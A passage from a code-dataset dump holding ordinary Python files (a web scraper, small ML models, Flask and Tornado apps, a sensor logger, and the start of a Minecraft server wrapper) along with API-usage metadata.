"eth2._utils.bitfield.set_voted", "line_number": 389, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 389, "usage_type": "name"}, {"api_name": "eth2.beacon.types.attestations.Attestation", "line_number": 391, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 393, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 397, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_epoch_at_slot", "line_number": 398, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost._balance_for_validator", "line_number": 420, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.score_block_by_root", "line_number": 423, "usage_type": "call"}, {"api_name": "eth2.beacon.epoch_processing_helpers.get_attesting_indices", "line_number": 434, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 544, "usage_type": "argument"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 550, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 552, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 559, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 602, "usage_type": "argument"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.lmd_ghost_scoring", "line_number": 604, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 605, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 491, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 499, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 499, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 515, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 515, "usage_type": "attribute"}]} +{"seq_id": "294958513", "text": "#!/usr/bin/env python\n# @Time : 2018/8/8 上午11:17\n# @Author : SeaRobbersAndDuck\n# @Site : \n# @File : littlestarspider.py\n# @Software: PyCharm\n\nimport scrapy\nfrom littlestar.items import GamerankItem\nimport time\n\nclass Gamerank(scrapy.Spider):\n name = 'ggame'\n allowed_domains = '9game.cn'\n start_urls = []\n for i in range(1,5):\n url = 'http://www.9game.cn/xyrb/'\n url = url + str(i) + '_0/'\n start_urls.append(url)\n print(start_urls)\n\n def parse(self, response):\n item = GamerankItem()\n time.sleep(4)\n games = response.xpath('//tr')\n for each_game in games:\n print(each_game)\n\n", "sub_path": "littlestar/littlestar/spiders/littlestarspider.py", "file_name": "littlestarspider.py", "file_ext": "py", "file_size_in_byte": 668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "scrapy.Spider", "line_number": 12, "usage_type": "attribute"}, {"api_name": "littlestar.items.GamerankItem", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "278812807", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.linear_model import Perceptron\n\ndata = np.array([[0, 1], [0, 0], [1, 0], [1, 1]])\ntarget = np.array([0, 0, 0, 1])\np = Perceptron(max_iter=100)\np_out = p.fit(data, target)\n# print(p.coef_, p.intercept_)\n\ncolors = np.array(['k', 'r'])\nmarkers = np.array(['*', 'o'])\n\nfor data, target in zip(data, target):\n plt.scatter(data[0], data[1], s=100, c=colors[target], marker=markers[target])\n\ngrad = -p.coef_[0][0]/p.coef_[0][1]\nintercept = -p.intercept_/p.coef_[0][1]\n\nx_vals = np.linspace(0, 1)\ny_vals = grad*x_vals + intercept\nplt.plot(x_vals, y_vals)\nplt.show()\n\n", "sub_path": "perceptron_training.py", "file_name": "perceptron_training.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Perceptron", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "330230566", "text": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Value_Net(nn.Module): # Critic\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(Value_Net, self).__init__()\n\t\tself.fc1 = nn.Linear(observation_dim + action_dim, 256)\n\t\tself.fc2 = nn.Linear(256, 256)\n\t\tself.fc3 = nn.Linear(256, 1)\n\n\tdef forward(self, state, action):\n\t\tx = torch.cat((state, action), dim=1)\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\t\n\t\treturn self.fc3(x)\n\n\nclass Policy_Net(nn.Module): # Actor\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(Policy_Net, self).__init__()\n\t\tself.fc1 = nn.Linear(observation_dim, 256)\n\t\tself.fc2 = nn.Linear(256, 256)\n\t\tself.fc3 = nn.Linear(256, action_dim)\n\n\tdef forward(self, observation):\n\t\tx = F.relu(self.fc1(observation))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = F.tanh(self.fc3(x))\n\t\t\n\t\treturn x\n\n\nclass DDPG(nn.Module):\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(DDPG, self).__init__()\n\t\tself.observation_dim = observation_dim\n\t\tself.action_dim = action_dim\n\n\t\tself.actor = Policy_Net(self.observation_dim, self.action_dim)\n\t\tself.critic = Value_Net(self.observation_dim, self.action_dim)\n\n\tdef forward(self, state):\n\t\taction = self.actor(state)\n\t\tvalue = self.critic(state, action)\n\t\treturn action, value", "sub_path": "DDPG/DDPG_Model.py", "file_name": "DDPG_Model.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "360410437", "text": "#!/usr/bin/env python\n\nimport os\nimport sys\n\nfrom setuptools import find_packages, setup\n\nrequirements = [\"pyyaml\", \"numpy\"]\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read().replace(\".. :changelog\", \"\")\n\n\ndoclink = \"\"\"\nDocumentation\n-------------\n\nA selection of small everyday tools.\n\nAt the moment includes a context handler, logging tool and a tool to standardize paths.\n\nPlease visit the Project Homepage: http://cosmo-docs.phys.ethz.ch/ekit for the Documenta tion.\"\"\"\n\nPACKAGE_PATH = os.path.abspath(os.path.join(__file__, os.pardir))\n\nsetup(\n name=\"ekit\",\n version=\"0.1.1\",\n description=\"Selection of small, general tools\",\n long_description=doclink,\n author=\"Dominik Zuercher\",\n author_email=\"dominikz@phys.ethz.ch\",\n url=\"https://cosmo-docs.phys.ethz.ch/ekit\",\n packages=find_packages(include=[\"ekit\"]),\n include_package_data=True,\n install_requires=requirements,\n license=\"MIT License\",\n zip_safe=False,\n keywords=\"ekit\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n", "sub_path": "pypi_install_script/ekit-0.1.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1375, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 27, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 29, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "85482845", "text": "#! /usr/bin/python\n\nimport sys\nimport json\nimport subprocess\n\n\ndef prettify_json(obj):\n obj = json.loads(obj)\n return json.dumps(obj, indent=3)\n\n\ndef clipboard(output):\n p = subprocess.Popen(['xsel', '-ib'], stdin=subprocess.PIPE)\n p.communicate(output)\n\n\nif __name__ == '__main__':\n data = subprocess.check_output('xsel')\n output = prettify_json(data)\n clipboard(output)\n", "sub_path": "keyboard_prettify_json.py", "file_name": "keyboard_prettify_json.py", "file_ext": "py", "file_size_in_byte": 393, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "270624209", "text": "#!/usr/bin/env python3\nfrom flask import Flask, request\n\nfrom items.items import items\nfrom items.init import git_init\nfrom items.info import info\n\napp = Flask(__name__)\n\nINIT_DEFAULT = ('useremail', 'username', 'production_releases',\n 'release_development','feature_branches','release_branches',\n 'hotfix_branches','support_branches','version_tag_prefix')\n\n@app.route(\"/api/init/git\", methods=['POST'])\ndef init():\n \"\"\"\n arguments:\n useremail='codevs_deck@codevs.cn'&\n username='codevs_deck'&\n production_releases='master'&\n release_development='develop'&\n feature_branches='feature/'&\n release_branches='release/'&\n hotfix_branches='hotfix/'&\n support_branches='support/'&\n version_tag_prefix=''\n \n \"\"\"\n req_id = request.json['ID']\n workdir = request.json['workdir']\n arguments = {}\n\n for i in request.json.keys():\n if i in INIT_DEFAULT:\n arguments[i] = request.json[i].strip()+'\\n'\n\n return git_init(req_id, workdir, **arguments)\n\n\n@app.route(\"/api/git/\", methods=['POST'])\ndef git_command(command):\n req_id = request.json['ID']\n workdir = request.json['workdir']\n argument_str = request.json['argument_str']\n userinfo = request.json.get('userinfo','')\n\n return items(req_id, workdir, command, argument_str, userinfo)\n\n@app.route(\"/api/info/git/\", methods=['GET'])\ndef git_info(workdir):\n return info(workdir)\n\n \n\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "flask/git_docker/git/deck_git.py", "file_name": "deck_git.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.json.keys", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "items.init.git_init", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "items.items.items", "line_number": 47, "usage_type": "call"}, {"api_name": "items.info.info", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "225946956", "text": "# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom datetime import datetime\nimport time\nimport functools\nimport os\nimport errno\nimport json\nfrom tinydb import TinyDB, where\nfrom sensor import Arduino\n\nimport tools\n\n\nclass Thread(QtCore.QThread):\n # this object is referenced as self.thread from SystemTrayIcon\n date = None\n\n def __init__(self, config):\n QtCore.QThread.__init__(self)\n self.s1 = Arduino(config['port'])\n self.sensors = config['sensors']\n self.db_folders = config['db_folders']\n\n for db_folder in self.db_folders:\n self.make_sure_path_exists(db_folder)\n for k in self.sensors:\n self.make_sure_path_exists(db_folder + \"/\" + k + \"_json\")\n self.make_sure_path_exists(db_folder + \"/\" + k + \"_txt\")\n\n for k, d in self.sensors.items():\n d['on'] = False\n d['interval'] = 60\n d['last_measurement'] = 0\n\n self.update_db_date()\n\n def make_sure_path_exists(self, path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def update_db_date(self):\n if self.date != self.get_current_date():\n self.date = self.get_current_date()\n for key in self.sensors:\n self.sensors[key]['dbs'] = []\n self.sensors[key]['txts'] = []\n for db_folder in self.db_folders:\n db_object = TinyDB(db_folder + key + \"_json/\" + key + \"_\" + self.date +\n \".json\", default_table='arduino', sort_keys=True, indent=4)\n self.sensors[key]['dbs'].append(db_object)\n txt_name = db_folder + key + \"_txt/\" + key + \"_\" + self.date + \".txt\"\n self.sensors[key]['txts'].append(txt_name)\n\n def get_current_date(self):\n date = datetime.now().strftime(\"%y-%m-%d\")\n return date\n\n def run(self):\n '''\n Main loop of the measuring thread.\n '''\n while True:\n for k in self.sensors:\n if self.sensors[k]['on']:\n if time.time() - self.sensors[k]['last_measurement'] > self.sensors[k]['interval']:\n self.get_measurement(k)\n self.sensors[k]['last_measurement'] = time.time()\n # Maximum measuring frequency\n time.sleep(1)\n\n def insert(self, sensor_key, reading):\n # TinyDB local storage\n for db in self.sensors[sensor_key]['dbs']:\n db.insert(reading)\n # TXT local storage\n for txt in self.sensors[sensor_key]['txts']:\n self.insert_txt(txt, sensor_key, reading)\n\n def insert_txt(self, fname, sensor_key, reading):\n if not os.path.isfile(fname):\n with open(fname, \"w\", encoding=\"utf-8\") as f:\n header = \"# \"\n header += '\\t'.join(reading.keys())\n header += \"\\n\"\n f.write(header)\n with open(fname, \"a\", encoding=\"utf-8\") as f:\n line = '\\t'.join(str(e) for e in reading.values())\n line += \"\\n\"\n f.write(line)\n\n def get_measurement(self, sensor_key):\n reading = self.s1.read(str.encode(self.sensors[sensor_key][\"key\"]))\n # print(reading)\n reading['stamp'] = int(time.time() * 1000)\n reading['date'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n self.update_db_date()\n self.insert(sensor_key, reading)\n\n def set_interval(self, key, interval):\n '''\n Sets measuring interval.\n '''\n self.sensors[key]['interval'] = interval\n print(\"Interval sensoru `{}` nastaven na {}.\".format(\n self.sensors[key]['name'], tools.pretty_time(interval)))\n\n def turn(self, k, status):\n st = ['vypnut', 'zapnut']\n if self.sensors[k]['on'] != status:\n self.sensors[k]['on'] = status\n print(\"{} byl {}.\".format(self.sensors[k]['name'], st[status]))\n else:\n print(\"{} byl už {}, žádná změna.\".format(self.sensors[k]['name'], st[status]))\n", "sub_path": "src/thread.py", "file_name": "thread.py", "file_ext": "py", "file_size_in_byte": 4179, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QThread.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 21, "usage_type": "name"}, {"api_name": "sensor.Arduino", "line_number": 22, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tinydb.TinyDB", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "name"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "tools.pretty_time", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "26613513", "text": "import os\n\nimport torch\n\nimport instanceseg.factory.data\nimport instanceseg.factory.models\nimport instanceseg.factory.optimizer\nimport instanceseg.factory.trainers\nfrom instanceseg.datasets import synthetic\nfrom instanceseg.utils import script_setup\nfrom scripts.configurations import synthetic_cfg\nfrom instanceseg.analysis import computational_complexity\n\n\ndef setup():\n cfg_override_kwargs = {}\n\n script_setup.set_random_seeds()\n gpu = 0\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu) if isinstance(gpu, int) else ','.join(str(gpu))\n cuda = torch.cuda.is_available()\n\n cfg = synthetic_cfg.get_default_train_config()\n for k, v in cfg_override_kwargs.items():\n cfg[k] = v\n problem_config = instanceseg.factory.models.get_problem_config(\n synthetic.ALL_BLOB_CLASS_NAMES, n_instances_per_class=cfg['n_instances_per_class'])\n model, start_epoch, start_iteration = instanceseg.factory.models.get_model(\n cfg, problem_config, checkpoint_file=None, semantic_init=None, cuda=cuda)\n\n print('Getting datasets')\n dataloaders = instanceseg.factory.data.get_dataloaders(cfg, 'synthetic', cuda, sampler_cfg=None)\n\n optim = instanceseg.factory.optimizer.get_optimizer(cfg, model)\n trainer = \\\n instanceseg.factory.trainers.get_trainer(cfg, cuda, model, dataloaders, problem_config, out_dir='/tmp/',\n optim=optim)\n return trainer\n\n\ndef main():\n trainer = setup()\n trainer.train()\n val_loss, metrics, _ = trainer.validate_split(\n should_export_visualizations=False, split='train')\n print('Training set mean IU: {}'.format(metrics[2]))\n\n trainer.model = computational_complexity.add_flops_counting_methods(trainer.model)\n\n trainer.model.start_flops_count()\n\n loader = iter(trainer.train_loader)\n\n data = loader.next()\n\n batch = Variable(data[0].cuda())\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "scripts/analysis/compute_complexity.py", "file_name": "compute_complexity.py", "file_ext": "py", "file_size_in_byte": 1929, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "instanceseg.utils.script_setup.set_random_seeds", "line_number": 18, "usage_type": "call"}, {"api_name": "instanceseg.utils.script_setup", "line_number": 18, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scripts.configurations.synthetic_cfg.get_default_train_config", "line_number": 23, "usage_type": "call"}, {"api_name": "scripts.configurations.synthetic_cfg", "line_number": 23, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.models.get_problem_config", "line_number": 26, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 26, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 26, "usage_type": "name"}, {"api_name": "instanceseg.datasets.synthetic.ALL_BLOB_CLASS_NAMES", "line_number": 27, "usage_type": "attribute"}, {"api_name": "instanceseg.datasets.synthetic", "line_number": 27, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.models.get_model", "line_number": 28, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 28, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 28, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.data.get_dataloaders", "line_number": 32, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 32, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.optimizer.get_optimizer", "line_number": 34, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 34, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 34, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.trainers.get_trainer", "line_number": 36, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 36, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 36, "usage_type": "name"}, {"api_name": "instanceseg.analysis.computational_complexity.add_flops_counting_methods", "line_number": 48, "usage_type": "call"}, {"api_name": "instanceseg.analysis.computational_complexity", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "329500183", "text": "from flask import Blueprint, render_template, request, session, redirect, url_for, make_response\nimport random\n\n# 1.蓝图初始化\nblue = Blueprint('app', __name__)\n\n\n@blue.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@blue.route('/login/', methods=['POST', 'GET'])\ndef login():\n if request.method == 'GET':\n # 获取存在redis数据库里的session里的值,返回页面\n username = session.get('username')\n return render_template('login.html', username=username)\n if request.method == 'POST':\n # 获取网页里的值,存在redis的session里。\n username = request.form.get('username')\n session['username'] = username\n return redirect(url_for('app.login'))\n\n\n@blue.route('/getresponse/')\ndef get_response():\n # 存储cookie\n response = make_response('

    你是大帅逼

    ')\n ticket = ''\n s = 'abcdefghijklmnopqrstuvwxyz0123456789'\n for i in range(20):\n ticket += random.choice(s)\n response.set_cookie('ticket', ticket, max_age='', expires='')\n return response\n\n\n@blue.route('/deletecookie/')\ndef del_cookie():\n # 删除cookie\n response = make_response('

    你是大帅逼

    ')\n response.delete_cookie('ticket')\n return response", "sub_path": "day2/App/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 29, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "189851833", "text": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport os\n\nimport tornado.web\n\nfrom handlers.index import fe_url\nfrom handlers.admin_index import admin_url\n\nsettings = dict(\n ##设置cookie密钥,默认为字符串\"secure cookies\"\n cookie_secret= \"lN2ImsFwS0yZlOM+d68dJZ5Ko7mrqEPEpInixMSWG84=\",\n ##设置登陆路径,未登陆用户在操作时跳转会用到这个参数,默认为@tornado.web.authenticated\n #login_url= \"/login\",\n ##设置防跨站请求攻击,默认为False,即不可防御。\n #xsrf_cookies= True,\n\n #设置templates路径\n template_path = os.path.join(os.path.dirname(__file__), \"templates\"),\n\n ##设置静态文件解析路径\n static_path = os.path.join(os.path.dirname(__file__), \"static\"),\n\n #设置调试模式,默认为False,即不是调试模式。\n debug = True,\n\n ##设置是否自动编码:在2.0以上需要设置此项来兼容您之前的APP,不设置默认为自动编码。\n #autoescape = None,\n\n ##设置template_loader,可以从独立的路径中导入template:其中utils为自己定义的模块,ZipLoader是tornado.template.BaseLoader的子类。\n #template_loader=utils.ZipLoader,\n\n ##设置gzip压缩:\n #gzip=True\n\n #设置静态路径头部,默认是\"/static/\"\n #static_url_prefix = \"/templates/\"\n\n\n ##设置静态文件处理类.默认是tornado.web.StaticFileHandler\n #static_handler_class = MyStaticFileHandler,\n\n ##设置静态文件的参数,默认为空字典。\n #static_handler_args = {{ \"key1\":\"value1\", \"key2\":\"value2\" }\n\n ##设置日志处理函数,日志处理函数your_fun,按照自己的意图记录日志。\n #log_function = your_fun,\n )\n\nroutes = fe_url + admin_url\n\napplication = tornado.web.Application(\n handlers = routes,\n **settings\n )", "sub_path": "vmall/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "handlers.index.fe_url", "line_number": 51, "usage_type": "name"}, {"api_name": "handlers.admin_index.admin_url", "line_number": 51, "usage_type": "name"}, {"api_name": "tornado.web.web.Application", "line_number": 53, "usage_type": "call"}, {"api_name": "tornado.web.web", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "187867510", "text": "\"\"\"\nMinecraft server instance representation\n\"\"\"\n\nimport asyncio\nimport fileinput\nimport glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport shlex\n\nimport requests\n\nfrom . import errors\n\nclass Server(object):\n \"\"\"\n A Minecraft server instance\n \"\"\"\n\n PROPERTIES_FILE = 'server.properties'\n PROPERTIES_REGEX = re.compile(r'^([a-zA-Z0-9\\-]+)=([^#]*)( *#.*)?$')\n PROPERTIES_BOOL_REGEX = re.compile(r'^(true|false)$', re.IGNORECASE)\n PROPERTIES_INT_REGEX = re.compile(r'^([0-9]+)$')\n SETTINGS_FILE = 'mymcadmin.settings'\n VERSION_URL = 'https://launchermeta.mojang.com/mc/game/version_manifest.json'\n\n def __init__(self, path):\n \"\"\"\n Create an instance of the Minecraft server at the given file path.\n This does not create a new Minecraft server, instead its used to model\n a server.\n \"\"\"\n\n self._path = path\n self._cache = {}\n self._properties_file = os.path.join(path, 